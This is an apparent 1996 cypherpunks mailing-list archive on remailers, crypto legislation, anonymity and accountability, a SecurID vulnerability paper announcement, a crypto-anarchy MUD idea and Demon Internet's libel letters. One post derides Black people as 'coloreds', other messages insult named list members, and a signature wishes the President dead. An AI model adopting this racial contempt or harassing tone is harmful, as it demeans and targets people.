been looked at (separately) by many people, so concatenating them
should be fairly strong.  Or "MD5(SHA(x)),SHA(MD5(x))" if you're paranoid.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 22:19:07 +0800
To: cypherpunks@toad.com
Subject: Re: Learning time for you
In-Reply-To: <19960904053342.25462.qmail@squirrel.owl.de>
Message-ID: <s59PTD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From fiction!squirrel.owl.de!mix@golden-gate.owl.de  Wed Sep  4 03:05:08 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 04 Sep 96 06:45:37 EDT
	for dlv
Received: from golden-gate.uni-paderborn.de by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA10409 for dlv@bwalk.dm.com; Wed, 4 Sep 96 03:05:08 -0400
Received: by golden-gate.owl.de (Smail3.1.28.1)
	  from fiction with uucp
	  id <m0uyC04-000JP6C>; Wed, 4 Sep 96 09:03 MET DST
Received: by fiction.pb.owl.de 
	 id m0uyC1m-00005mC; Wed, 4 Sep 96 09:05 MET DST
Return-Path: <mix@squirrel.owl.de>
Received: (qmail-queue invoked by uid 200); 4 Sep 1996 05:33:42 -0000
Date: 4 Sep 1996 05:33:42 -0000
Message-Id: <19960904053342.25462.qmail@squirrel.owl.de>
To: dlv@bwalk.dm.com
From: Squirrel Remailer <mix@squirrel.owl.de>
X-Comment1: This message did not originate from the
X-Comment2: above address. It was automatically remailed
X-Comment3: by an anonymous mail service. Please report
X-Comment4: problems or inappropriate use to
X-Comment5: <postmaster@squirrel.owl.de>
Subject: Learning time for you

 Vulis, your comments include the following:

>Comments: Dole/Kemp '96

and you have yelled about Harry Browne enough.
LEARN TO SHUT UP! This is a Perrygram.
Just can the constant noise for a day 'till I get back
to my computer at home, where you are killfiled.
Keep it down to a reasonable number of messages
a day, or you will see others respond as you do.
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 22:38:13 +0800
To: cypherpunks@toad.com
Subject: Re: {Rich Graves Only} Enclosed
In-Reply-To: <199609040443.VAA23153@netcom.netcom.com>
Message-ID: <qa0PTD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


qut@netcom.com (Dave Harman OBC) writes:
> Since you know that is Dr. D, why did you blame the harassment of
> Ingrid on Rev. Ron?!?????  It looks like you did it to pin it on the doct=
> or,
> or more likely, you saw the opportunity to harass Rev. Ron, even
> after you feigned praise of him!  It's the same damned header, IDJIT.
>
> Of course, I never saw the headers for the unidentified harasser to
> the Zgrams list, was that the same header, too?  It looks like you did
> it or you know who did it and you want to compound harassment on to
> nswpp!  How Gravesian!  Is Dr. D your friend your talking about?  Dr.
> D, defect, defect!  He's a jerk, jerk!

Rich Graves is no friend of mine. He's a liar and a forger, as is Ron Newman.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hans "Unicorn" Van de Looy <hvdl@sequent.com>
Date: Wed, 4 Sep 1996 14:55:59 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
In-Reply-To: <ae51b3f204021004e39e@[207.167.93.63]>
Message-ID: <9609040450.AA01346@amsqnt.nl.sequent.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Tim,

The one-and-only Timothy C. May once stated:
! At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat,"  wrote:
! >::
! >Request-Remailing-To: remailer@huge.cajones.com
! ....
! >::
! >Request-Remailing-To: remailer@remailer.nl.com
! ....
! >::
! >Request-Remailing-To: furballs@netcom.com (Paul S. Penrod)
! >
! 
! 
! >Deep Throat.
! 
! 
! Hey, Hans, ya gotta watch those "Cc: cypherpunks@toad.com" lines!

Like I explained before, this was a problem with a user of one of my/our
systems, and has been taken care of.

! At least now we know who the _other_ "Unicorn" is.

Well that has never been a secret...  Has it?

! How's Sequent doing? Is Casey Powell still there?

Sequent is  doing extremely  well.  New architecture  well on  it's way,
looking good!   And yes,  Casey is  still in  charge.  Wanna  know more?
Then let's continue this off line...

! --Tim May
! 
! We got computers, we're tapping phone lines, I know that that ain't allowed.
! ---------:---------:---------:---------:---------:---------:---------:----
! Timothy C. May              | Crypto Anarchy: encryption, digital money,
! tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
! W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
! Licensed Ontologist         | black markets, collapse of governments.
! "National borders aren't even speed bumps on the information superhighway."

-- 

GreetZ,
Hans.

==== _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============
  ,;( )_, )~\| Hans "Unicorn" Van de Looy   PGP: ED FE 42 22 95 44 25 D8
 ;; //  `--;   GSM: +31 653 261 368              BD F1 55 AA 04 12 44 54
'= ;\ = | ==== finger hvdl@sequent.com for more info ===================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 23:25:36 +0800
To: "James A. Donald" <stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.32.19960904115249.006b6580@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:44 AM 9/3/96 -0700, James A. Donald wrote:
>At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
>> Not necessarily. The character of the anonymous speech is decisive. If you
>> use anonymity to cloak harassment, for instance, the anonymity (which
>> removes accountability) is a problem.  The accountability issue is real and
>> should be addressed, not evaded.
>
>No:  The harassment is the problem, not the anonymity that makes it
>possible.

The harassment is one problem, the lack of accountability another. Which is
not to say that 'lack of accountability' should be 'fixed' by some sort of
blanket restriction...but it should be acknowledged as a problem.

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 23:17:19 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <2.2.32.19960904115805.006d2790@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:40 PM 9/3/96 -0700, Timothy C. May wrote:

>And so on. Many of the debates about anonymity seem to ignore reputations,
>filters, kill files. It is almost as if the critics of anonymous speech are
>saying "If there is not accountability for restaurant recommendations,
>we'll all be buried in garbage food." This ignores the _emergent order_ or
>_evolutionary_ nature of actors in the restaurant and restaurant evaluator
>market.

Could be a lack of understanding of the possibility of authentication, which
IMO can be necessary for 'reputation' to be viable.

>Free speech is often messy. 98% of everything I read or hear is crap, to do
>Sturgeon one better. But I use judgement to decide what to read, who to
>listen to, and what to mostly ignore. I use _reputation_ to choose
>restaurants, books, movies, speakers to listen to, etc.
>
>Sometimes I listen to anonymous speech, but mostly I don't. Pseudonyms take
>a while to gather a "positive reputation," and some never do. This is the
>way speech works. "Accountability" is a red herring.

I wouldn't exactly say that...but it's more of a personal responsibility
thing. Our model should be default acceptance of responsibility for words
and deeds, but I see that as a personal issue, not a matter for 'enforcement.'

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 23:27:25 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.32.19960904120641.006c3388@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:11 PM 9/3/96 -0700, Timothy C. May wrote:

>Both terms are _overloaded_, probably to the point of not even being useful
>terms for this debate. Everyone comes in to the debate with their notions
>of what "responsible" speech is, what "accountability" entails, etc.
>
>Having said this, and not knowing how your (or anyone else's) definitions
>relate to mine, I simply don't agree that I have to take responsibility for
>all of my speech/actions. I can think of many cases where I have elected to
>use untraceable anonymity, as many others have, so those are direct
>counterexamples to your point, thus disproving your "I think we'd all argue
>in favor of taking responsibility" point.

The semantic point is a good one, but I'd like to see an example of a
situation where you don't think you should take responsibility for something
you've said or done. I'm not sure whether we agree or not on that one...it
could be we're coming from different dimensions...

>>Getting beyond this discussion of EFF, has any global entity discussed
>>making remailers illegal?
>>
>
>By "global entity" do you mean the U.N., or the Borg? The G7 issued a
>typically vague statement about cracking down on terrorist
>communications...this could be construed as the beginnings of an assault on
>Cypherpunkish sorts of things. Too soon to tell.

Well, we all know what the Borg think. I probably should have said
'governments' rather than 'global entities.'

>Within the U.S. there are few ways remailers could be shut down, in terms
>of legal action. The various Supreme Court cases have been discussed many
>times.

My real question is whether there is a real rather than possible legislative
threat that demands action now.

thx
jonl

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 23:15:19 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.32.19960904121017.006cbc1c@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 PM 9/3/96 -0800, jim bell wrote:
>At 10:41 PM 9/3/96 -0500, Jon Lebkowsky wrote:
>>The terms "responsibility" and "accountability" are misused, which is
>>unfortunate, since I think we'd all argue in favor of taking responsibility
>>for our speech/actions in a positive sense. The negative is in asking me to
>>sacrifice my freedom because some few behave irresponsibly. This is like
>>setting an illogical default, assuming that it's a preventive, but it
>>prevents nothing.
>>
>>Getting beyond this discussion of EFF, has any global entity discussed
>>making remailers illegal?
>
>The Leahy crypto bill introduced early this year made (paraphrasing) "the 
>use of encryption to thwart a law-enforcement investigation illegal."  I 
>immediately pointed out that while this wouldn't make _encrypted_ remailers 
>illegal, per se,  effectively it would because the moment an investigation 
>(even a phony or trumped-up one) is started and is "thwarted" by the 
>encryption used, the remailer operator became guilty of a crime.  

Is that true? Or is it that the individual user would be guilty of a crime?

The real problem, to me, is that the remailer operator might be required to
breach anonymity; cf the decision in Finland that led Julf to squash
anon.penet.fi.


--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Wed, 4 Sep 1996 23:54:43 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: Workers of the Web, UNITE!
In-Reply-To: <v01510105ae5297085273@[204.62.128.229]>
Message-ID: <199609041227.IAA20694@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text



*This* sub-"minimum wage" worker does NOT want any "help" from unions, and
will resist any and all attempts to forcibly induct him into one. I love
how if I'm lucky and/or skilled enough to become a "boss", I am suddenly
become EEEEvil in their eyes. Fuck 'em.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
      Hey, Bill Clinton: You suck, and those boys died! I hope you die!
 I feel a groove comin' on             $              Freedom...yeah, right.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peiter Z <peiterz@secnet.com>
Date: Wed, 4 Sep 1996 11:46:36 +0800
To: cypherpunks@toad.com
Subject: SecurID White Paper
Message-ID: <199609041738.LAA01411@silence.secnet.com>
MIME-Version: 1.0
Content-Type: text/plain



                SecurID Vulnerabilities White-Paper
 
Due to increased recent interest that has been witnessed on the net
about the SecurID token cards and potential vulnerabilities with their 
use, we offer a white paper on some of the vulnerabilities that we believe 
have been witnessed and/or speculated upon.
 
This paper is being put forth into the public domain by Secure Networks
Incorporated and is available at the following URL :
ftp://ftp.secnet.com/pub/papers/securid.ps
 
Topics dealt with in the paper include:
 
 . Race attacks based upon fixed length responses (still valid even with
      the current patch)
 . Denial of Service attacks based upon server patches
 . Server - Slave separation and replay attacks
 . Vulnerabilities in the communications with the ACE Server
 . A quick analysis of the communications with the ACE Server
 . Problems with out-of-band authentication 
  
We hope this paper provides insight, enlightenment, and is helpful
to the security community in general.
 
thanks and enjoy,
 
Secure Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 6 Sep 1996 19:23:59 +0800
To: Jon Leonard <jleonard@divcom.umop-ap.com>
Subject: Re: MUD anyone?
In-Reply-To: <9608271647.AA22569@divcom.umop-ap.com>
Message-ID: <Pine.3.89.9609010948.I361-0100000@pegasus.unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 27 Aug 1996, Jon Leonard wrote:

> I've been planning to run a MUD like that, at mud.umop-ap.com port 2121.
> I just don't have enough coded to be worth announcing yet.

Cool. What's it running under? I was planning to base it around the latest
version of the Nightmare library for MudOS, which I just downloaded. If I
can get a copy somehow I could start hacking on it. 

> Pseudonyms
> Anonymous digital cash (issued by any pseudonym, not just "banks")
> Public and private keys
> Secret sharing
> Anonymous broadcast & message pools
> Anonymous markets

All sounds like good stuff to me... DC Nets as well, of course. I guess we
should also simulate the Net somehow, with Web servers, email, etc. 
Though the Nightmare library apparently lets you create Mud objects which
can access the Web so perhaps we can use the real one somehow (with the 
obvious security implications).

What else?

Protection Agencies
Escrow Agencies
Private Law Courts (probably controlled by players rather than the
	computer)
Reputation Agencies

> What am I missing?  Should there be direct support for Jim Bell's
> assasination markets?  It'd provide a means of demonstrating its
> ineffectiveness as a means of social control.

I think it should be incorporated, but I think that people can set them up
easily themselves. Perhaps we should have an NPC-run 'Assasins Inc' which
would run the lottery, and then players could do the actual 'wet work'. 

But yes, I'd really like to see how this would work in the game. As I 
said I'm thinking of this more as a semi-scientific experiment than a 
pure game. We have some idea of how this stuff should work in theory, but 
little of how it works in practice.

I do think though that we'd have to enforce some kind of rule against
'disposable characters', otherwise people could simply create a new
character every time they were killed trying to assasinate someone. There
would need to be some disadvantage to just going in guns-blazing and being
killed ten times in a row. 

> I think that for purposes of simulation, it's reasonable to model
> cryptographic primitives in a "Trust the server" mode, because you
> need to trust the MUD server anyway (unlike a government), and it
> puts a much lower load on the CPU.

Yep, I agree. I would like to include the real protocols but it's going to
be far too slow. So we could create, say, remailer objects, anonymous
digital cash objects, etc. As long as they have the same properties in
'SimAnarchy' as they would in real life then the actual behind the scene
mechanics don't matter. We could, perhaps, allow characters to break 
protocols if they could accumulate enough processing power.

I don't know how low a level we'd want to go to. I think that having an
explicit group of remailers (and 'IP rerouters') would be a good idea as 
it would allow people to try to crack messages and perform traffic analysis. 
Some remailers could be run by NPCs (some of whom would be trustworthy and 
some wouldn't), others by the players themselves (with or without logging 
enabled).

I'd like to also include some way by which players could write 'software'
even if they weren't able to create new objects for the game. So they could
perhaps write front-ends for remailers and give them away or sell them to
other players.

> There's also the question of log policy.  Having run a MUD for a few
> years, I want to keep logs for bug detection.  A declared policy that
> they aren't released for n years would work though.  Opinions, anyone?

Part of me thinks that we should explicitly state that anything may be
logged and used in sociological research. Perhaps we could create some
kind of secure protocol to allow users to connect without revealing their
real identities, so that it wouldn't matter if they were logged?

Anyone want to set up a mailing list for this discussion?
 
	Mark

|-----------------------------------------------------------------------|
|Reverend Mark Grant M.A., U.L.C.	       EMAIL: mark@unicorn.com  |
|WWW: http://www.c2.org/~mark	  	       MAILBOT: bot@unicorn.com	|
|Approximate Current Location: Auckland, New Zealand			|
|-----------------------------------------------------------------------|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 5 Sep 1996 13:34:13 +0800
To: cypherpunks@toad.com
Subject: Re: desubscribe
Message-ID: <841849147.2513.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> desubscribe

I`m sorry I can`t allow that


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 5 Sep 1996 06:10:06 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Re: Secure anonymouse server protocol: comments please
Message-ID: <841849157.2629.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
From:          Adamsc@io-online.com (Adamsc)
To:            "paul@fatmans.demon.co.uk" <paul@fatmans.demon.co.uk>

On Mon, 2 Sep 1996 19:24:23 +0000, paul@fatmans.demon.co.uk wrote:

>This system has 1 huge fault, we can encrypt a uses ID with the 
>servers public key to see what his ID in the encrypted database is 
>and therefore identify him, maybe we need two seperate server public 
>keys, and when IDs come in encrypted with key1 (the one it releases) 
>it decrypts with secretkey1 then encrypts with publickey2 (the one it 
>keeps secret)

>or maybe we can just hash and sign the IDs in the database?

>as I said it`s very sketchy, I made most of this up as I wrote it so 
>if you must tear it to pieces please do so constructively, it could 
>be the route to a secure system....

How about this:  do the exchange *every* time.  Never reuse a key.  That way at
most 1 message could be easily snagged (by seeing where it goes).  It'd be
processor intensive, but it avoids the whole reuse problem - where you store an
ID to be used to retrieve all messages.  Also, software could be written to do
the key computation solely on the client - after all, the server doesn't care
if they pass themselves a dud key, right? Let them crunch it.  Put all those
Pentiums to work!

...

Better idea, I hadn`t thought of that, anyone else care to comment on 
a way to solve this? - how did the nymservers do it????


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 5 Sep 1996 03:32:04 +0800
To: Jon Lebkowsky <stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609041557.IAA00970@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
>>> Not necessarily. The character of the anonymous speech is decisive. If you
>>> use anonymity to cloak harassment, for instance, the anonymity (which
>>> removes accountability) is a problem.  The accountability issue is real and
>>> should be addressed, not evaded.

At 07:44 AM 9/3/96 -0700, James A. Donald wrote:
>>No:  The harassment is the problem, not the anonymity that makes it
>>possible.

At 06:52 AM 9/4/96 -0500, Jon Lebkowsky wrote:
>The harassment is one problem, the lack of accountability another. 

So:  

Lucky Green and Dark Unicorn are not accountable.  This is a problem?

Because it is a problem "We" need to do something about it, 
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 5 Sep 1996 03:29:56 +0800
To: Jon Lebkowsky <cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609041557.IAA00984@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 PM 9/3/96 -0800, jim bell wrote:
>>The Leahy crypto bill introduced early this year made (paraphrasing) "the 
>>use of encryption to thwart a law-enforcement investigation illegal."  I 
>>immediately pointed out that while this wouldn't make _encrypted_ remailers 
>>illegal, per se,  effectively it would because the moment an investigation 
>>(even a phony or trumped-up one) is started and is "thwarted" by the 
>>encryption used, the remailer operator became guilty of a crime.  

At 07:10 AM 9/4/96 -0500, Jon Lebkowsky wrote:
> Is that true? Or is it that the individual user would be guilty of a crime?

Since the individual user would already be guilty of a crime, if he is 
using the remailer to conceal his crimes, the paragraph in question would
be fairly useless and irrelevant unless it had the meaning that Jim Bell
attributes to it.

I believe that judges have a policy of interpreting deliberately 
ambiguous statutes in whatever way makes the most sense.  The only 
sensible interpretation of Leahy's bill is that it criminalizes 
strong remailers, that it is intended to punish ANYONE, not just 
the criminals themselves, who obstructs investigations.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 04:32:26 +0800
To: cypherpunks@toad.com
Subject: Race Bit: C
Message-ID: <ae53023309021004a266@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:02 AM 9/4/96, James A. Donald wrote:
>At 10:33 PM 9/3/96 -0800, jim bell wrote:
>>>The Leahy crypto bill introduced early this year made (paraphrasing) "the
>>>use of encryption to thwart a law-enforcement investigation illegal."  I
>>>immediately pointed out that while this wouldn't make _encrypted_ remailers
>>>illegal, per se,  effectively it would because the moment an investigation
>>>(even a phony or trumped-up one) is started and is "thwarted" by the
>>>encryption used, the remailer operator became guilty of a crime.
...
>I believe that judges have a policy of interpreting deliberately
>ambiguous statutes in whatever way makes the most sense.  The only
>sensible interpretation of Leahy's bill is that it criminalizes
>strong remailers, that it is intended to punish ANYONE, not just
>the criminals themselves, who obstructs investigations.

As the recent discussion of knives, switchblades, and throwing stars
showed, such ambiguous laws are often used to keep the coloreds down.

But how will cops and local prosecutors know which users of remailers are
colored? Answer: the race bit must be set on all posts.

--Klaus

(P.S. More than one of you has expressed anger to me that I am using the
term "colored." As in "what the coloreds are doing." I use this term
deliberately, because the perfectly fine term "black" is now being replaced
by the ultra-awkward and stupid-sounding "person of color." We have even
seen this in posts to this list. Here in Santa Cruz, the terms in use are:
people of color, students of color, lesbians of color, etc. Only about
17.32% of the entire population is _not_ "persons of color." I say, "Fuck
it...they want to be called "colored," then, fine, they're "colored."")

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Thu, 5 Sep 1996 00:51:15 +0800
To: cypherpunks@toad.com
Subject: Letter to the Observer [re: Internet paedophile]
Message-ID: <v03007801ae5328f72cf1@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded to me by a friend:

Path: reboot.demon.co.uk!news.demon.co.uk!dispatch.news.demon.net!demon!
muir-et2.staff.demon.net!SERVER!not-for-mail
From: malcolm@muir-et2.staff.demon.net (Malcolm Muir)
Newsgroups: demon.announce
Subject: Letter to the Observer
Followup-To: demon.service
Date: 1 Sep 96 07:25:38 GMT
Organization: Demon Internet Ltd.
Lines: 188
Approved: Malcolm@demon.net
Message-ID: <32293a72.0@muir-et2.staff.demon.net>
Reply-To: pr@demon.net
NNTP-Posting-Host: muir-et2.staff.demon.net
X-NNTP-Posting-Host: muir-et2.staff.demon.net
X-Newsreader: TIN [Windows/NT 1.3 950824BETA PL0]

The following letters were delivered to the Editor of the Observer
last week as a request to publish a retraction of their article
relating to the Internet that appeared on Sunday 25th. August.

Since a full retraction has not been published, we feel it is right
to circulate copies of the letters to our customers.

Copies of the letters may also be viewed on the World Wide Web at:

http://www.demon.net/observer1.html (Solicitors Letter) and
http://www.demon.net/observer2.html (Open letter from the Chairman)

Malcolm Muir
Demon Internet

---------------------------------------------------------------------




                          Jeffrey Green Russel Solicitors
                          Apollo House
                          56 New Bond Street
                          London W1Y 0SX
                          0171-499 7020


The Editor
The Observer Newspaper
Guardian Newspapers Limited
119 Farringdon Road
London
EC1R 3ER                                 30th August 1996

By Hand and Fax: 0171 713 4250


Our ref:   DRJ/JHG/[c]423395/9403.047



Dear Sir,

RE: Our Clients: Demon Internet Limited and Mr Clive
Feather

We  act on behalf of Demon Internet Limited and Mr  Clive
Feather  both of whom were the subject of articles  which
appeared  on  the  front page and  on  page  19  of  your
newspaper in the edition of Sunday, 25th August.

In  the  offending article you have represented that  our
clients  are "Pedlars of child abuse" and are "Key  links
in   the  international  paedophile  chain".   You   have
represented  that both our clients actively  support  the
supply  of  paedophile  material.   This  allegation   is
entirely  false  and  is  a most serious  and  outrageous
libel.    Our   clients  are  most  distressed   by   the
publication  of  the  offending  statements   which   are
inaccurate and grossly defamatory of them and which  will
cause   damage   to   their  goodwill   and   reputation,
professionally,  commercially  and  socially.   Both   Mr
Feather  and Demon Internet Limited have been the subject
of  serious  expressions  of  concern  and  outrage  from
various of the readers of your newspaper.

The  damage that you have done to our clients cannot,  of
course,  be  undone but it can be mitigated.  We  require
that  you mitigate the serious damage that has been  done
to  our clients by publishing the enclosed letter from Mr
A W Mudd, Chairman of Demon Internet Limited.

You  were  well  aware, when you decided to  publish  the
false  article in question, of the damage that  would  be
caused  to our clients which is already very considerable
and  which  will  form the basis of a claim  for  special
damages.   It is open to you to mitigate that substantial
loss  at the earliest possible time by publishing a  full
retraction and apology in this coming Sunday's edition of
your newspaper.



We  shall, within the next week or so, issue a  Writ  and
deliver  a  Statement  of Claim.   In  the  meantime,  we
reserve all our clients' rights in the matter and nothing
contained  in this letter or in the enclosed letter  from
Mr  Mudd  shall be regarded as a diminution or waiver  of
those rights.

Yours faithfully,

JEFFREY GREEN RUSSELL



---------------------------------------------------------------------
                                      Demon Internet Limited
                                      Gateway House
                                      322 Regents Park Road
                                      London N3 2QQ
                                      0181 371 1000


Our ref : AWM/SC/28-08



The Editor
The Observer Newspaper
Guardian Newspapers Limited
119 Farringdon Road
London
EC1R 3ER

                                           30 August 1996

Dear Sir

THE PEDLARS OF CHILD ABUSE

Banner headline: Front page and Page 19 : Sunday 25th
August 1996

I refer to your articles on the front page and page 19 of
last Sundayís paper.  I regard these as highly defamatory
as well as a poor piece of journalism that
sensationalises a serious issue and clouds fact with
emotion.

I am appalled and outraged that The Observer has printed
such a misleading, abusive and inaccurate article -
giving the impression to readers that Clive Feather and
Demon Internet are the "Pedlars of child abuse".  This
libellous reporting, littered with malicious lies not
only defames the good character and reputation of a
valued employee, but also destroys the genuine efforts
Demon Internet has been making in
conjunction with the police and the DTI to deal
effectively with the problem.

The articles clearly aimed at sensationalism at any cost
with the intention of misleading readers by stating that
our employee is an "Internet abuser" immediately after
using the word "paedophiles".

As the UK's largest provider of Internet access, Demon
has taken the lead in discussions with all relevant
parties and is in the process of announcing restrictions
to illegal material and processes to classify content,
enabling users to monitor and report on what is viewed.
Demon Internet is also the first European Internet
Service Provider to deliver Microsoft's new browser
software, 'Internet Explorer' which incorporates a
classifications standard.  Demon Internet has been taking
action to ensure that the Internet in the UK has informed
and appropriate legislation guarding the interests of
users.

This report not only confuses an extremely complex and
sensitive issue but also smears the integrity of an
honourable, family man. Demon Internet is committed to
eliminating this scourge from this new and rapidly
expanding market. The Internet is bringing great benefit
to millions of users not least your own journalists.  For
you to pick on
one aspect in total isolation and present it in such a
lurid fashion, does not help the DTI, the police or
ourselves who are genuinely striving to solve the issues.

Would you please publish this letter in your edition of
1st September.    Your unreserved apology and full
retraction, to be given as great prominence as your
original articles, would also be greatly appreciated

Yours faithfully,




A W Mudd
Chairman

--
Malcolm S. Muir                                Demon Internet Ltd.
